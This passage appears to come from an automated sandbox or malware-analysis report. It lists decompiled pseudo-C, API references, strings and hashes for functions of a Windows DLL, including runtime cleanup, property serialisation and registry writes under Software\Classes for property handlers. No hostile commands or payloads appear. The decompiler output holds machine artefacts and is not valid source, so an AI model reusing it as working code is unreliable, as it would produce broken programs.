						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}

0x10007337
0x1000733f
0x10007345
0x1000734b
0x1000734f
0x10007351
0x10007358
0x1000735e
0x10007361
0x00000000
0x00000000
0x00000000
0x10007361
0x10007363
0x10007363
0x10007369
0x1000736b
0x10007370
0x10007379
0x10007381
0x10007383
0x10007389
0x1000738f
0x10007392
0x00000000
0x00000000
0x00000000
0x10007392
0x10007394
0x10007394
0x1000739b
0x100073a6
0x100073ac
0x100073b7
0x100073bf
0x100073c5
0x100073ce
0x100073d1
0x100073d6
0x100073d8
0x100073de
0x100073e3
0x100073ea
0x100073ed
0x100073f3
0x100073f3
0x100073f9
0x10007400
0x10007403
0x10007409
0x10007409
0x10007415
0x1000741e
0x10007420
0x1000742c
0x1000742f
0x10007435
0x00000000
0x10007435
0x1000742c
0x1000743d

APIs

DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
_free.LIBCMT ref: 10007358

Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758

_free.LIBCMT ref: 1000736B
_free.LIBCMT ref: 10007389
_free.LIBCMT ref: 1000739B
_free.LIBCMT ref: 100073AC
_free.LIBCMT ref: 100073B7
_free.LIBCMT ref: 100073D1
EncodePointer.KERNEL32(00000000), ref: 100073D8
_free.LIBCMT ref: 100073ED
_free.LIBCMT ref: 10007403
InterlockedDecrement.KERNEL32 ref: 10007415
_free.LIBCMT ref: 1000742F

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
String ID:
API String ID: 4264854383-0
Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94

Uniqueness

Uniqueness Score: -1.00%

Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0xa957ef0b
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}

0x10002f79
0x10002f80
0x10002f85
0x10002f89
0x10002f9a
0x10002f9c
0x10002fa4
0x10002fb1
0x10002fb9
0x10003285
0x10003295
0x10002fd7
0x10002fd7
0x10002fda
0x10002fe0
0x10002fee
0x10002ff6
0x10003272
0x10003277
0x1000327d
0x00000000
0x10003283
0x10002ffc
0x10003002
0x10003009
0x10003017
0x1000301d
0x10003023
0x10003027
0x1000307e
0x1000307e
0x10003264
0x10003264
0x1000326d
0x00000000
0x1000326d
0x1000309c
0x100030a1
0x100030a8
0x10003258
0x10003258
0x10003261
0x00000000
0x10003261
0x100030b2
0x100030bc
0x100031fe
0x1000320d
0x10003215
0x1000321b
0x1000321f
0x00000000
0x00000000
0x10003221
0x10003227
0x10003237
0x1000323a
0x1000323e
0x1000324c
0x1000324c
0x10003255
0x00000000
0x10003255
0x10003240
0x10003240
0x10003249
0x00000000
0x10003249
0x100030dd
0x100030e2
0x100030e6
0x00000000
0x00000000
0x100030ec
0x100030f2
0x100030f9
0x1000310b
0x1000310d
0x10003111
0x00000000
0x00000000
0x1000311e
0x10003128
0x10003130
0x10003138
0x1000313d
0x10003144
0x10003157
0x1000315a
0x10003162
0x1000316a
0x1000316f
0x10003175
0x1000317c
0x1000317e
0x10003184
0x1000318c
0x10003198
0x1000319c
0x100031a5
0x100031aa
0x100031b0
0x100031b4
0x100031b6
0x100031bc
0x100031c4
0x100031d0
0x100031d4
0x100031dd
0x100031e8
0x100031e8
0x100031f1
0x100031f1
0x100031fa
0x100031fa
0x00000000
0x10003144
0x10003029
0x1000302c
0x10003033
0x10003045
0x1000304b
0x1000304f
0x00000000
0x00000000
0x10003055
0x1000305b
0x1000306b
0x1000306e
0x10003070
0x10003079
0x1000307c
0x00000000
0x1000307c

APIs

_memset.LIBCMT ref: 10002F9C
PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1

Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6

VariantClear.OLEAUT32(?), ref: 100031F1
VariantClear.OLEAUT32(?), ref: 100031FA
CoTaskMemFree.OLE32(?), ref: 1000327D

Strings

Property[@Key = '%s'], xrefs: 1000308B
Key, xrefs: 10003193
ExtendedProperties, xrefs: 10003011, 1000303F
Property, xrefs: 100030D0
EncodedValue, xrefs: 100031CB

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
API String ID: 2822920939-4160240301
Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x10007719
0x1000771b
0x10007720
0x10007727
0x1000772d
0x1000772f
0x10007738
0x10007758
0x1000775c
0x1000775d
0x1000775e
0x10007765
0x10007767
0x1000776c
0x10007785
0x1000778a
0x10007790
0x10007799
0x1000779f
0x100077a2
0x100077a5
0x100077ae
0x100077b1
0x100077b7
0x100077ba
0x100077bd
0x100077c0
0x100077c3
0x100077c3
0x100077ce
0x100077d9
0x10007908
0x10007908
0x10007908
0x1000790e
0x00000000
0x00000000
0x10007919
0x1000791f
0x10007925
0x1000793a
0x10007940
0x10007947
0x1000794c
0x1000794e
0x10007942
0x10007944
0x10007944
0x10007958
0x1000795d
0x100079a4
0x100079aa
0x100079ad
0x100079b3
0x100079ba
0x100079bf
0x100079bf
0x00000000
0x10007963
0x10007964
0x1000796c
0x00000000
0x00000000
0x1000796e
0x10007970
0x10007978
0x10007985
0x10007990
0x10007995
0x10007999
0x1000799f
0x00000000
0x1000799f
0x1000798b
0x1000798d
0x1000798d
0x00000000
0x1000798d
0x1000797e
0x00000000
0x1000797e
0x1000792c
0x10007932
0x100079c6
0x100079c6
0x00000000
0x100079c6
0x10007925
0x100079cc
0x100079d3
0x1000774d
0x1000774f
0x10007750
0x10007755
0x10007755
0x100077df
0x100077e4
0x00000000
0x00000000
0x100077ea
0x100077ec
0x100077ef
0x100077f2
0x100077f7
0x10007801
0x10007803
0x10007805
0x10007805
0x1000780a
0x1000780b
0x1000780e
0x10007820
0x10007822
0x10007827
0x100078bb
0x100078c2
0x100078c8
0x100078d8
0x100078de
0x100078e1
0x100078e4
0x100078e8
0x100078ee
0x100078f1
0x100078f4
0x100078f7
0x100078f7
0x100078fc
0x100078fd
0x10007900
0x00000000
0x10007900
0x1000782d
0x10007833
0x00000000
0x10007833
0x10007836
0x10007838
0x1000783b
0x1000783e
0x10007841
0x10007849
0x1000784e
0x100078a8
0x100078a8
0x100078a9
0x100078af
0x100078b0
0x100078b3
0x100078b6
0x00000000
0x10007855
0x10007855
0x10007859
0x00000000
0x00000000
0x1000785d
0x1000786d
0x1000787a
0x10007881
0x10007886
0x1000788d
0x10007895
0x10007899
0x1000789f
0x100078a2
0x100078a5
0x100078a5
0x00000000
0x100078a5
0x10007860
0x10007866
0x1000786b
0x00000000
0x00000000
0x00000000
0x1000786b
0x1000784e
0x00000000
0x10007841
0x10007779
0x10007781
0x00000000
0x10007781
0x10007745
0x00000000

APIs

__lock.LIBCMT ref: 10007727

Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6

@_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
__calloc_crt.LIBCMT ref: 1000775E
@_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
__calloc_crt.LIBCMT ref: 10007819
GetFileType.KERNEL32 ref: 10007860
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
GetStdHandle.KERNEL32(-000000F6), ref: 10007952
GetFileType.KERNEL32 ref: 10007964
InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 301580142-0
Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003400, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0xa957ef0b
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t41 = _a12;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}

0x10003409
0x10003410
0x10003417
0x1000341b
0x10003425
0x10003428
0x1000343f
0x10003441
0x1000344b
0x10003458
0x10003458
0x00000000
0x1000344d
0x1000344d
0x10003452
0x00000000
0x10003454
0x10003454
0x1000345d
0x1000345f
0x1000345f
0x10003454
0x10003452
0x10003465
0x1000347a
0x1000348a
0x10003490
0x10003494
0x1000349f
0x1000349f
0x100034a1
0x100034a3
0x100034b0
0x100034ba
0x100034c2
0x100034e2
0x100034e8
0x100034c4
0x100034c4
0x100034d4
0x00000000
0x00000000
0x100034d4
0x100034c2
0x100034b0
0x100034a1
0x10003501

APIs

vswprintf.LIBCMT ref: 10003441

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
StrCmpNICW.SHLWAPI(A957EF0B,Software\Classes\%s,00000013), ref: 100034BA
StrStrIW.SHLWAPI(A957EF0B,PropertyHandlers), ref: 100034D0
StrStrIW.SHLWAPI(A957EF0B,KindMap), ref: 100034DC

Strings

PropertyHandlers, xrefs: 100034CA
Software\Classes\%s, xrefs: 100034B4
KindMap, xrefs: 100034D6

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Value__vsnwprintf_llstrlenvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1581644826-984809517
Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003510, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0xa957ef0b
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t39 = _a12;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
